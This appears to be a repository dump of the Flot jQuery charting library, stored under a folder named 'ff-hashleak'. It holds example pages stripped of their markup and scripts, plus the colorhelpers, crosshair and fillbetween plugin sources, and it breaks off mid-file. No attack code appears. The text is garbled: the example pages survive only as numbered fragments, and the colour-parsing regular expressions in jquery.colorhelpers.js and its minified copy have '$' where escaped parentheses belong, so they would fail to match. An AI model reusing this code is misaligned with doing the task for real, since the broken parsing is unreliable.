With multiple axes, you sometimes need to interact with them. A 17 | simple way to do this is to draw the plot, deduce the axis 18 | placements and insert a couple of divs on top to catch events. 19 | Try clicking an axis.

20 | 21 |

22 | 23 | 96 | 97 | 98 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/interacting.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

One of the goals of Flot is to support user interactions. Try 17 | pointing and clicking on the points.

18 | 19 |

Mouse hovers at 20 | (0, 0).

21 | 22 |

A tooltip is easy to build with a bit of jQuery code and the 23 | data returned from the plot.

24 | 25 |

Enable tooltip

26 | 27 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/layout.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: sans-serif; 3 | font-size: 16px; 4 | margin: 50px; 5 | max-width: 800px; 6 | } 7 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/navigate.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 27 | 28 | 29 |

Flot Examples

30 | 31 |

32 | 33 |

34 | 35 |

With the navigate plugin it is easy to add panning and zooming. 36 | Drag to pan, double click to zoom (or use the mouse scrollwheel).

37 | 38 |

The plugin fires events (useful for synchronizing several 39 | plots) and adds a couple of public methods so you can easily build 40 | a little user interface around it, like the little buttons at the 41 | top right in the plot.

42 | 43 | 44 | 116 | 117 | 118 | 119 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/percentiles.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

Height in centimeters of individuals from the US (2003-2006) as function of 18 | age in years (source: CDC). 19 | The 15%-85%, 25%-75% and 50% percentiles are indicated.

20 | 21 |

For each point of a filled curve, you can specify an arbitrary 22 | bottom. As this example illustrates, this can be useful for 23 | plotting percentiles. If you have the data sets available without 24 | appropriate fill bottoms, you can use the fillbetween plugin to 25 | compute the data point bottoms automatically.

26 | 27 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/realtime.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

You can update a chart periodically to get a real-time effect 17 | by using a timer to insert the new data in the plot and redraw it.

18 | 19 |

Time between updates: milliseconds

20 | 21 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/resize.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 20 | 21 | 22 |

Flot Examples

23 | 24 |

25 | 26 |

27 | 28 |

Sometimes it makes more sense to just let the plot take up the 29 | available space. In that case, we need to redraw the plot each 30 | time the placeholder changes its size. If you include the resize 31 | plugin, this is handled automatically.

32 | 33 |

Try resizing the window.

34 | 35 | 36 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/selection.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

1000 kg. CO₂ emissions per year per capita for various countries (source: Wikipedia).

18 | 19 |

Flot supports selections through the selection plugin. 20 | You can enable rectangular selection 21 | or one-dimensional selection if the user should only be able to 22 | select on one axis. Try left-click and drag on the plot above 23 | where selection on the x axis is enabled.

24 | 25 |

You selected:

26 | 27 |

The plot command returns a plot object you can use to control 28 | the selection. Click the buttons below.

29 | 30 |

31 |

32 | 33 |

Selections are really useful for zooming. Just replot the 34 | chart with min and max values for the axes set to the values 35 | in the "plotselected" event triggered. Enable the checkbox 36 | below and select a region again.

37 | 38 |

Zoom to selection.

39 | 40 | 112 | 113 | 114 | 115 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/setting-options.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

There are plenty of options you can set to control the precise 17 | looks of your plot. You can control the ticks on the axes, the 18 | legend, the graph type, etc. The idea is that Flot goes to great 19 | lengths to provide sensible defaults so that you don't have to 20 | customize much for a good result.

21 | 22 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/stacking.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

With the stack plugin, you can have Flot stack the 18 | series. This is useful if you wish to display both a total and the 19 | constituents it is made of. The only requirement is that you provide 20 | the input sorted on x.

21 | 22 |

23 | 24 | 25 |

26 | 27 |

28 | 29 | 30 | 31 |

32 | 33 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/symbols.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

Various point types. Circles are built-in. For other 18 | point types, you can define a little callback function to draw the 19 | symbol; some common ones are available in the symbol plugin.

20 | 21 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/thresholding.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

With the threshold plugin, you can apply a specific color to 18 | the part of a data series below a threshold. This is can be useful 19 | for highlighting negative values, e.g. when displaying net results 20 | or what's in stock.

21 | 22 |

23 | 24 | 25 | 26 |

27 | 28 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/tracking.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

You can add crosshairs that'll track the mouse position, either 18 | on both axes or as here on only one.

19 | 20 |

If you combine it with listening on hover events, you can use 21 | it to track the intersection on the curves by interpolating 22 | the data points (look at the legend).

23 | 24 |

25 | 26 | 93 | 94 | 95 | 96 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/turning-series.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

Here is an example with real data: military budgets for 17 | various countries in constant (2005) million US dollars (source: SIPRI).

18 | 19 |

Since all data is available client-side, it's pretty easy to 20 | make the plot interactive. Try turning countries on/off with the 21 | checkboxes below.

22 | 23 |

Show:

24 | 25 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/visitors.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

Visitors per day to the Flot homepage. Weekends are colored. Try zooming. 18 | The plot below shows an overview.

19 | 20 |

21 | 22 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/zooming.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 |

17 |

18 | 19 |

20 |

21 | 22 |

23 |

24 | 25 |

The selection support makes it easy to 26 | construct flexible zooming schemes. With a few lines of code, the 27 | small overview plot to the right has been connected to the large 28 | plot. Try selecting a rectangle on either of them.

29 | 30 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.colorhelpers.js: -------------------------------------------------------------------------------- 1 | /* Plugin for jQuery for working with colors. 2 | * 3 | * Version 1.1. 4 | * 5 | * Inspiration from jQuery color animation plugin by John Resig. 6 | * 7 | * Released under the MIT license by Ole Laursen, October 2009. 8 | * 9 | * Examples: 10 | * 11 | * $.color.parse("#fff").scale('rgb', 0.25).add('a', -0.5).toString() 12 | * var c = $.color.extract($("#mydiv"), 'background-color'); 13 | * console.log(c.r, c.g, c.b, c.a); 14 | * $.color.make(100, 50, 25, 0.4).toString() // returns "rgba(100,50,25,0.4)" 15 | * 16 | * Note that .scale() and .add() return the same modified object 17 | * instead of making a new one. 18 | * 19 | * V. 1.1: Fix error handling so e.g. parsing an empty string does 20 | * produce a color rather than just crashing. 21 | */ 22 | 23 | (function($) { 24 | $.color = {}; 25 | 26 | // construct color object with some convenient chainable helpers 27 | $.color.make = function (r, g, b, a) { 28 | var o = {}; 29 | o.r = r || 0; 30 | o.g = g || 0; 31 | o.b = b || 0; 32 | o.a = a != null ? a : 1; 33 | 34 | o.add = function (c, d) { 35 | for (var i = 0; i < c.length; ++i) 36 | o[c.charAt(i)] += d; 37 | return o.normalize(); 38 | }; 39 | 40 | o.scale = function (c, f) { 41 | for (var i = 0; i < c.length; ++i) 42 | o[c.charAt(i)] *= f; 43 | return o.normalize(); 44 | }; 45 | 46 | o.toString = function () { 47 | if (o.a >= 1.0) { 48 | return "rgb("+[o.r, o.g, o.b].join(",")+")"; 49 | } else { 50 | return "rgba("+[o.r, o.g, o.b, o.a].join(",")+")"; 51 | } 52 | }; 53 | 54 | o.normalize = function () { 55 | function clamp(min, value, max) { 56 | return value < min ? min: (value > max ? max: value); 57 | } 58 | 59 | o.r = clamp(0, parseInt(o.r), 255); 60 | o.g = clamp(0, parseInt(o.g), 255); 61 | o.b = clamp(0, parseInt(o.b), 255); 62 | o.a = clamp(0, o.a, 1); 63 | return o; 64 | }; 65 | 66 | o.clone = function () { 67 | return $.color.make(o.r, o.b, o.g, o.a); 68 | }; 69 | 70 | return o.normalize(); 71 | } 72 | 73 | // extract CSS color property from element, going up in the DOM 74 | // if it's "transparent" 75 | $.color.extract = function (elem, css) { 76 | var c; 77 | do { 78 | c = elem.css(css).toLowerCase(); 79 | // keep going until we find an element that has color, or 80 | // we hit the body 81 | if (c != '' && c != 'transparent') 82 | break; 83 | elem = elem.parent(); 84 | } while (!$.nodeName(elem.get(0), "body")); 85 | 86 | // catch Safari's way of signalling transparent 87 | if (c == "rgba(0, 0, 0, 0)") 88 | c = "transparent"; 89 | 90 | return $.color.parse(c); 91 | } 92 | 93 | // parse CSS color string (like "rgb(10, 32, 43)" or "#fff"), 94 | // returns color object, if parsing failed, you get black (0, 0, 95 | // 0) out 96 | $.color.parse = function (str) { 97 | var res, m = $.color.make; 98 | 99 | // Look for rgb(num,num,num) 100 | if (res = /rgb$\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*$/.exec(str)) 101 | return m(parseInt(res[1], 10), parseInt(res[2], 10), parseInt(res[3], 10)); 102 | 103 | // Look for rgba(num,num,num,num) 104 | if (res = /rgba$\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]+(?:\.[0-9]+)?)\s*$/.exec(str)) 105 | return m(parseInt(res[1], 10), parseInt(res[2], 10), parseInt(res[3], 10), parseFloat(res[4])); 106 | 107 | // Look for rgb(num%,num%,num%) 108 | if (res = /rgb$\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*$/.exec(str)) 109 | return m(parseFloat(res[1])*2.55, parseFloat(res[2])*2.55, parseFloat(res[3])*2.55); 110 | 111 | // Look for rgba(num%,num%,num%,num) 112 | if (res = /rgba$\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\s*$/.exec(str)) 113 | return m(parseFloat(res[1])*2.55, parseFloat(res[2])*2.55, parseFloat(res[3])*2.55, parseFloat(res[4])); 114 | 115 | // Look for #a0b1c2 116 | if (res = /#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(str)) 117 | return m(parseInt(res[1], 16), parseInt(res[2], 16), parseInt(res[3], 16)); 118 | 119 | // Look for #fff 120 | if (res = /#([a-fA-F0-9])([a-fA-F0-9])([a-fA-F0-9])/.exec(str)) 121 | return m(parseInt(res[1]+res[1], 16), parseInt(res[2]+res[2], 16), parseInt(res[3]+res[3], 16)); 122 | 123 | // Otherwise, we're most likely dealing with a named color 124 | var name = $.trim(str).toLowerCase(); 125 | if (name == "transparent") 126 | return m(255, 255, 255, 0); 127 | else { 128 | // default to black 129 | res = lookupColors[name] || [0, 0, 0]; 130 | return m(res[0], res[1], res[2]); 131 | } 132 | } 133 | 134 | var lookupColors = { 135 | aqua:[0,255,255], 136 | azure:[240,255,255], 137 | beige:[245,245,220], 138 | black:[0,0,0], 139 | blue:[0,0,255], 140 | brown:[165,42,42], 141 | cyan:[0,255,255], 142 | darkblue:[0,0,139], 143 | darkcyan:[0,139,139], 144 | darkgrey:[169,169,169], 145 | darkgreen:[0,100,0], 146 | darkkhaki:[189,183,107], 147 | darkmagenta:[139,0,139], 148 | darkolivegreen:[85,107,47], 149 | darkorange:[255,140,0], 150 | darkorchid:[153,50,204], 151 | darkred:[139,0,0], 152 | darksalmon:[233,150,122], 153 | darkviolet:[148,0,211], 154 | fuchsia:[255,0,255], 155 | gold:[255,215,0], 156 | green:[0,128,0], 157 | indigo:[75,0,130], 158 | khaki:[240,230,140], 159 | lightblue:[173,216,230], 160 | lightcyan:[224,255,255], 161 | lightgreen:[144,238,144], 162 | lightgrey:[211,211,211], 163 | lightpink:[255,182,193], 164 | lightyellow:[255,255,224], 165 | lime:[0,255,0], 166 | magenta:[255,0,255], 167 | maroon:[128,0,0], 168 | navy:[0,0,128], 169 | olive:[128,128,0], 170 | orange:[255,165,0], 171 | pink:[255,192,203], 172 | purple:[128,0,128], 173 | violet:[128,0,128], 174 | red:[255,0,0], 175 | silver:[192,192,192], 176 | white:[255,255,255], 177 | yellow:[255,255,0] 178 | }; 179 | })(jQuery); 180 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.colorhelpers.min.js: -------------------------------------------------------------------------------- 1 | (function(b){b.color={};b.color.make=function(f,e,c,d){var h={};h.r=f||0;h.g=e||0;h.b=c||0;h.a=d!=null?d:1;h.add=function(k,j){for(var g=0;g=1){return"rgb("+[h.r,h.g,h.b].join(",")+")"}else{return"rgba("+[h.r,h.g,h.b,h.a].join(",")+")"}};h.normalize=function(){function g(j,k,i){return ki?i:k)}h.r=g(0,parseInt(h.r),255);h.g=g(0,parseInt(h.g),255);h.b=g(0,parseInt(h.b),255);h.a=g(0,h.a,1);return h};h.clone=function(){return b.color.make(h.r,h.b,h.g,h.a)};return h.normalize()};b.color.extract=function(e,d){var f;do{f=e.css(d).toLowerCase();if(f!=""&&f!="transparent"){break}e=e.parent()}while(!b.nodeName(e.get(0),"body"));if(f=="rgba(0, 0, 0, 0)"){f="transparent"}return b.color.parse(f)};b.color.parse=function(f){var e,c=b.color.make;if(e=/rgb$\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*$/.exec(f)){return c(parseInt(e[1],10),parseInt(e[2],10),parseInt(e[3],10))}if(e=/rgba$\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]+(?:\.[0-9]+)?)\s*$/.exec(f)){return c(parseInt(e[1],10),parseInt(e[2],10),parseInt(e[3],10),parseFloat(e[4]))}if(e=/rgb$\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*$/.exec(f)){return c(parseFloat(e[1])*2.55,parseFloat(e[2])*2.55,parseFloat(e[3])*2.55)}if(e=/rgba$\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\s*$/.exec(f)){return c(parseFloat(e[1])*2.55,parseFloat(e[2])*2.55,parseFloat(e[3])*2.55,parseFloat(e[4]))}if(e=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(f)){return c(parseInt(e[1],16),parseInt(e[2],16),parseInt(e[3],16))}if(e=/#([a-fA-F0-9])([a-fA-F0-9])([a-fA-F0-9])/.exec(f)){return c(parseInt(e[1]+e[1],16),parseInt(e[2]+e[2],16),parseInt(e[3]+e[3],16))}var d=b.trim(f).toLowerCase();if(d=="transparent"){return c(255,255,255,0)}else{e=a[d]||[0,0,0];return c(e[0],e[1],e[2])}};var a={aqua:[0,255,255],azure:[240,255,255],beige:[245,245,220],black:[0,0,0],blue:[0,0,255],brown:[165,42,42],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgrey:[169,169,169],darkgreen:[0,100,0],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkviolet:[148,0,211],fuchsia:[255,0,255],gold:[255,215,0],green:[0,128,0],indigo:[75,0,130],khaki:[240,230,140],lightblue:[173,216,230],lightcyan:[224,255,255],lightgreen:[144,238,144],lightgrey:[211,211,211],lightpink:[255,182,193],lightyellow:[255,255,224],lime:[0,255,0],magenta:[255,0,255],maroon:[128,0,0],navy:[0,0,128],olive:[128,128,0],orange:[255,165,0],pink:[255,192,203],purple:[128,0,128],violet:[128,0,128],red:[255,0,0],silver:[192,192,192],white:[255,255,255],yellow:[255,255,0]}})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.crosshair.js: -------------------------------------------------------------------------------- 1 | /* 2 | Flot plugin for showing crosshairs, thin lines, when the mouse hovers 3 | over the plot. 4 | 5 | crosshair: { 6 | mode: null or "x" or "y" or "xy" 7 | color: color 8 | lineWidth: number 9 | } 10 | 11 | Set the mode to one of "x", "y" or "xy". The "x" mode enables a 12 | vertical crosshair that lets you trace the values on the x axis, "y" 13 | enables a horizontal crosshair and "xy" enables them both. "color" is 14 | the color of the crosshair (default is "rgba(170, 0, 0, 0.80)"), 15 | "lineWidth" is the width of the drawn lines (default is 1). 16 | 17 | The plugin also adds four public methods: 18 | 19 | - setCrosshair(pos) 20 | 21 | Set the position of the crosshair. Note that this is cleared if 22 | the user moves the mouse. "pos" is in coordinates of the plot and 23 | should be on the form { x: xpos, y: ypos } (you can use x2/x3/... 24 | if you're using multiple axes), which is coincidentally the same 25 | format as what you get from a "plothover" event. If "pos" is null, 26 | the crosshair is cleared. 27 | 28 | - clearCrosshair() 29 | 30 | Clear the crosshair. 31 | 32 | - lockCrosshair(pos) 33 | 34 | Cause the crosshair to lock to the current location, no longer 35 | updating if the user moves the mouse. Optionally supply a position 36 | (passed on to setCrosshair()) to move it to. 37 | 38 | Example usage: 39 | var myFlot = $.plot( $("#graph"), ..., { crosshair: { mode: "x" } } }; 40 | $("#graph").bind("plothover", function (evt, position, item) { 41 | if (item) { 42 | // Lock the crosshair to the data point being hovered 43 | myFlot.lockCrosshair({ x: item.datapoint[0], y: item.datapoint[1] }); 44 | } 45 | else { 46 | // Return normal crosshair operation 47 | myFlot.unlockCrosshair(); 48 | } 49 | }); 50 | 51 | - unlockCrosshair() 52 | 53 | Free the crosshair to move again after locking it. 54 | */ 55 | 56 | (function ($) { 57 | var options = { 58 | crosshair: { 59 | mode: null, // one of null, "x", "y" or "xy", 60 | color: "rgba(170, 0, 0, 0.80)", 61 | lineWidth: 1 62 | } 63 | }; 64 | 65 | function init(plot) { 66 | // position of crosshair in pixels 67 | var crosshair = { x: -1, y: -1, locked: false }; 68 | 69 | plot.setCrosshair = function setCrosshair(pos) { 70 | if (!pos) 71 | crosshair.x = -1; 72 | else { 73 | var o = plot.p2c(pos); 74 | crosshair.x = Math.max(0, Math.min(o.left, plot.width())); 75 | crosshair.y = Math.max(0, Math.min(o.top, plot.height())); 76 | } 77 | 78 | plot.triggerRedrawOverlay(); 79 | }; 80 | 81 | plot.clearCrosshair = plot.setCrosshair; // passes null for pos 82 | 83 | plot.lockCrosshair = function lockCrosshair(pos) { 84 | if (pos) 85 | plot.setCrosshair(pos); 86 | crosshair.locked = true; 87 | } 88 | 89 | plot.unlockCrosshair = function unlockCrosshair() { 90 | crosshair.locked = false; 91 | } 92 | 93 | function onMouseOut(e) { 94 | if (crosshair.locked) 95 | return; 96 | 97 | if (crosshair.x != -1) { 98 | crosshair.x = -1; 99 | plot.triggerRedrawOverlay(); 100 | } 101 | } 102 | 103 | function onMouseMove(e) { 104 | if (crosshair.locked) 105 | return; 106 | 107 | if (plot.getSelection && plot.getSelection()) { 108 | crosshair.x = -1; // hide the crosshair while selecting 109 | return; 110 | } 111 | 112 | var offset = plot.offset(); 113 | crosshair.x = Math.max(0, Math.min(e.pageX - offset.left, plot.width())); 114 | crosshair.y = Math.max(0, Math.min(e.pageY - offset.top, plot.height())); 115 | plot.triggerRedrawOverlay(); 116 | } 117 | 118 | plot.hooks.bindEvents.push(function (plot, eventHolder) { 119 | if (!plot.getOptions().crosshair.mode) 120 | return; 121 | 122 | eventHolder.mouseout(onMouseOut); 123 | eventHolder.mousemove(onMouseMove); 124 | }); 125 | 126 | plot.hooks.drawOverlay.push(function (plot, ctx) { 127 | var c = plot.getOptions().crosshair; 128 | if (!c.mode) 129 | return; 130 | 131 | var plotOffset = plot.getPlotOffset(); 132 | 133 | ctx.save(); 134 | ctx.translate(plotOffset.left, plotOffset.top); 135 | 136 | if (crosshair.x != -1) { 137 | ctx.strokeStyle = c.color; 138 | ctx.lineWidth = c.lineWidth; 139 | ctx.lineJoin = "round"; 140 | 141 | ctx.beginPath(); 142 | if (c.mode.indexOf("x") != -1) { 143 | ctx.moveTo(crosshair.x, 0); 144 | ctx.lineTo(crosshair.x, plot.height()); 145 | } 146 | if (c.mode.indexOf("y") != -1) { 147 | ctx.moveTo(0, crosshair.y); 148 | ctx.lineTo(plot.width(), crosshair.y); 149 | } 150 | ctx.stroke(); 151 | } 152 | ctx.restore(); 153 | }); 154 | 155 | plot.hooks.shutdown.push(function (plot, eventHolder) { 156 | eventHolder.unbind("mouseout", onMouseOut); 157 | eventHolder.unbind("mousemove", onMouseMove); 158 | }); 159 | } 160 | 161 | $.plot.plugins.push({ 162 | init: init, 163 | options: options, 164 | name: 'crosshair', 165 | version: '1.0' 166 | }); 167 | })(jQuery); 168 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.crosshair.min.js: -------------------------------------------------------------------------------- 1 | (function(b){var a={crosshair:{mode:null,color:"rgba(170, 0, 0, 0.80)",lineWidth:1}};function c(h){var j={x:-1,y:-1,locked:false};h.setCrosshair=function e(l){if(!l){j.x=-1}else{var k=h.p2c(l);j.x=Math.max(0,Math.min(k.left,h.width()));j.y=Math.max(0,Math.min(k.top,h.height()))}h.triggerRedrawOverlay()};h.clearCrosshair=h.setCrosshair;h.lockCrosshair=function f(k){if(k){h.setCrosshair(k)}j.locked=true};h.unlockCrosshair=function g(){j.locked=false};function d(k){if(j.locked){return}if(j.x!=-1){j.x=-1;h.triggerRedrawOverlay()}}function i(k){if(j.locked){return}if(h.getSelection&&h.getSelection()){j.x=-1;return}var l=h.offset();j.x=Math.max(0,Math.min(k.pageX-l.left,h.width()));j.y=Math.max(0,Math.min(k.pageY-l.top,h.height()));h.triggerRedrawOverlay()}h.hooks.bindEvents.push(function(l,k){if(!l.getOptions().crosshair.mode){return}k.mouseout(d);k.mousemove(i)});h.hooks.drawOverlay.push(function(m,k){var n=m.getOptions().crosshair;if(!n.mode){return}var l=m.getPlotOffset();k.save();k.translate(l.left,l.top);if(j.x!=-1){k.strokeStyle=n.color;k.lineWidth=n.lineWidth;k.lineJoin="round";k.beginPath();if(n.mode.indexOf("x")!=-1){k.moveTo(j.x,0);k.lineTo(j.x,m.height())}if(n.mode.indexOf("y")!=-1){k.moveTo(0,j.y);k.lineTo(m.width(),j.y)}k.stroke()}k.restore()});h.hooks.shutdown.push(function(l,k){k.unbind("mouseout",d);k.unbind("mousemove",i)})}b.plot.plugins.push({init:c,options:a,name:"crosshair",version:"1.0"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.fillbetween.js: -------------------------------------------------------------------------------- 1 | /* 2 | Flot plugin for computing bottoms for filled line and bar charts. 3 | 4 | The case: you've got two series that you want to fill the area 5 | between. In Flot terms, you need to use one as the fill bottom of the 6 | other. You can specify the bottom of each data point as the third 7 | coordinate manually, or you can use this plugin to compute it for you. 8 | 9 | In order to name the other series, you need to give it an id, like this 10 | 11 | var dataset = [ 12 | { data: [ ... ], id: "foo" } , // use default bottom 13 | { data: [ ... ], fillBetween: "foo" }, // use first dataset as bottom 14 | ]; 15 | 16 | $.plot($("#placeholder"), dataset, { line: { show: true, fill: true }}); 17 | 18 | As a convenience, if the id given is a number that doesn't appear as 19 | an id in the series, it is interpreted as the index in the array 20 | instead (so fillBetween: 0 can also mean the first series). 21 | 22 | Internally, the plugin modifies the datapoints in each series. For 23 | line series, extra data points might be inserted through 24 | interpolation. Note that at points where the bottom line is not 25 | defined (due to a null point or start/end of line), the current line 26 | will show a gap too. The algorithm comes from the jquery.flot.stack.js 27 | plugin, possibly some code could be shared. 28 | */ 29 | 30 | (function ($) { 31 | var options = { 32 | series: { fillBetween: null } // or number 33 | }; 34 | 35 | function init(plot) { 36 | function findBottomSeries(s, allseries) { 37 | var i; 38 | for (i = 0; i < allseries.length; ++i) { 39 | if (allseries[i].id == s.fillBetween) 40 | return allseries[i]; 41 | } 42 | 43 | if (typeof s.fillBetween == "number") { 44 | i = s.fillBetween; 45 | 46 | if (i < 0 || i >= allseries.length) 47 | return null; 48 | 49 | return allseries[i]; 50 | } 51 | 52 | return null; 53 | } 54 | 55 | function computeFillBottoms(plot, s, datapoints) { 56 | if (s.fillBetween == null) 57 | return; 58 | 59 | var other = findBottomSeries(s, plot.getData()); 60 | if (!other) 61 | return; 62 | 63 | var ps = datapoints.pointsize, 64 | points = datapoints.points, 65 | otherps = other.datapoints.pointsize, 66 | otherpoints = other.datapoints.points, 67 | newpoints = [], 68 | px, py, intery, qx, qy, bottom, 69 | withlines = s.lines.show, 70 | withbottom = ps > 2 && datapoints.format[2].y, 71 | withsteps = withlines && s.lines.steps, 72 | fromgap = true, 73 | i = 0, j = 0, l; 74 | 75 | while (true) { 76 | if (i >= points.length) 77 | break; 78 | 79 | l = newpoints.length; 80 | 81 | if (points[i] == null) { 82 | // copy gaps 83 | for (m = 0; m < ps; ++m) 84 | newpoints.push(points[i + m]); 85 | i += ps; 86 | } 87 | else if (j >= otherpoints.length) { 88 | // for lines, we can't use the rest of the points 89 | if (!withlines) { 90 | for (m = 0; m < ps; ++m) 91 | newpoints.push(points[i + m]); 92 | } 93 | i += ps; 94 | } 95 | else if (otherpoints[j] == null) { 96 | // oops, got a gap 97 | for (m = 0; m < ps; ++m) 98 | newpoints.push(null); 99 | fromgap = true; 100 | j += otherps; 101 | } 102 | else { 103 | // cases where we actually got two points 104 | px = points[i]; 105 | py = points[i + 1]; 106 | qx = otherpoints[j]; 107 | qy = otherpoints[j + 1]; 108 | bottom = 0; 109 | 110 | if (px == qx) { 111 | for (m = 0; m < ps; ++m) 112 | newpoints.push(points[i + m]); 113 | 114 | //newpoints[l + 1] += qy; 115 | bottom = qy; 116 | 117 | i += ps; 118 | j += otherps; 119 | } 120 | else if (px > qx) { 121 | // we got past point below, might need to 122 | // insert interpolated extra point 123 | if (withlines && i > 0 && points[i - ps] != null) { 124 | intery = py + (points[i - ps + 1] - py) * (qx - px) / (points[i - ps] - px); 125 | newpoints.push(qx); 126 | newpoints.push(intery) 127 | for (m = 2; m < ps; ++m) 128 | newpoints.push(points[i + m]); 129 | bottom = qy; 130 | } 131 | 132 | j += otherps; 133 | } 134 | else { // px < qx 135 | if (fromgap && withlines) { 136 | // if we come from a gap, we just skip this point 137 | i += ps; 138 | continue; 139 | } 140 | 141 | for (m = 0; m < ps; ++m) 142 | newpoints.push(points[i + m]); 143 | 144 | // we might be able to interpolate a point below, 145 | // this can give us a better y 146 | if (withlines && j > 0 && otherpoints[j - otherps] != null) 147 | bottom = qy + (otherpoints[j - otherps + 1] - qy) * (px - qx) / (otherpoints[j - otherps] - qx); 148 | 149 | //newpoints[l + 1] += bottom; 150 | 151 | i += ps; 152 | } 153 | 154 | fromgap = false; 155 | 156 | if (l != newpoints.length && withbottom) 157 | newpoints[l + 2] = bottom; 158 | } 159 | 160 | // maintain the line steps invariant 161 | if (withsteps && l != newpoints.length && l > 0 162 | && newpoints[l] != null 163 | && newpoints[l] != newpoints[l - ps] 164 | && newpoints[l + 1] != newpoints[l - ps + 1]) { 165 | for (m = 0; m < ps; ++m) 166 | newpoints[l + ps + m] = newpoints[l + m]; 167 | newpoints[l + 1] = newpoints[l - ps + 1]; 168 | } 169 | } 170 | 171 | datapoints.points = newpoints; 172 | } 173 | 174 | plot.hooks.processDatapoints.push(computeFillBottoms); 175 | } 176 | 177 | $.plot.plugins.push({ 178 | init: init, 179 | 